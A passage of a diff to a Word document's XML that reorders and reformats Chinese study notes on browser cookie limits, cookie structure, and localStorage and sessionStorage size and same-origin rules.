-        </w:rPr>
         <w:t>Cookie的限制</w:t>
       </w:r>
     </w:p>
@@ -26383,7 +27359,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26415,7 +27391,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26447,10 +27423,33 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>IE6及之前的版本限制每个域最多20个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26458,7 +27457,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>IE6及之前的版本限制每个域最多20个cookie</w:t>
+        <w:t>IE7及之后的版本限制50个cookie</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26469,11 +27468,34 @@
           <w:numId w:val="46"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>Firefox限制每个域最多50个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26481,7 +27503,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>IE7及之后的版本限制50个cookie</w:t>
+        <w:t>Opera限制每个域最多30个cookie</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26492,81 +27514,76 @@
           <w:numId w:val="46"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Safari和Chrome对cookie的数量没有限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>浏览器对域的大小也有限制</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Firefox限制每个域最多50个cookie</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Opera限制每个域最多30个cookie</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Safari和Chrome对cookie的数量没有限制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
+        <w:t>，大多数浏览器都有大约</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:b/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>4kb的长度限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26575,7 +27592,55 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>浏览器对域的大小也有限制</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Cookie的构成</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>C</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26583,8 +27648,39 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>，大多数浏览器都有大约</w:t>
-      </w:r>
+        <w:t>ookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>由浏览器保存由以下信息组成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
@@ -26592,31 +27688,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>4kb的长度限制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
+        <w:t>名称</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>：cookie的名称，具有唯一性，不区分大小写，cookie名称必须经过URL编码</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26628,79 +27708,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Cookie的构成</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ookie</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>由浏览器保存由以下信息组成</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26712,7 +27720,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>名称</w:t>
+        <w:t>值</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26720,46 +27728,14 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>：cookie的名称，具有唯一性，不区分大小写，cookie名称必须经过URL编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>值</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t>存储在cookie中的字符串值，必须经过URL编码</w:t>
       </w:r>
     </w:p>
@@ -26772,7 +27748,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26863,7 +27839,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26941,7 +27917,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -26981,7 +27957,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -27291,21 +28267,132 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>要访问同一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>LocalStorage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>页面必须来自同一个域名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>子域名无效</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，使用同一种协议，在同一个端口上。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在 HTML5 中，数据不是由每个服务器请求传递的，而是只有在请求时使用数据。它使在不影响网站性能的情况下存储大量数据成为可能。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:color w:val="FF0000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>在 HTML5 中，数据不是由每个服务器请求传递的，而是只有在请求时使用数据。它使在不影响网站性能的情况下存储大量数据成为可能。</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27318,19 +28405,21 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
-          <w:sz w:val="22"/>
+          <w:b/>
+          <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:b/>
           <w:color w:val="222222"/>
-          <w:sz w:val="22"/>
+          <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>对于不同的网站，数据存储于不同的区域，并且一个网站只能访问其自身的数据。</w:t>
+        <w:t>限制</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27344,19 +28433,135 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
-          <w:sz w:val="22"/>
+          <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
           <w:color w:val="222222"/>
-          <w:sz w:val="22"/>
+          <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>HTML5 使用 JavaScript 来存储和访问数据。</w:t>
+        <w:t>对于</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>localStorage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>而言，大多数浏览器会有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>5MB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>SessionStorage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>有的浏览器没有限制，有的有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>2.5MB</w:t>
+      </w:r>
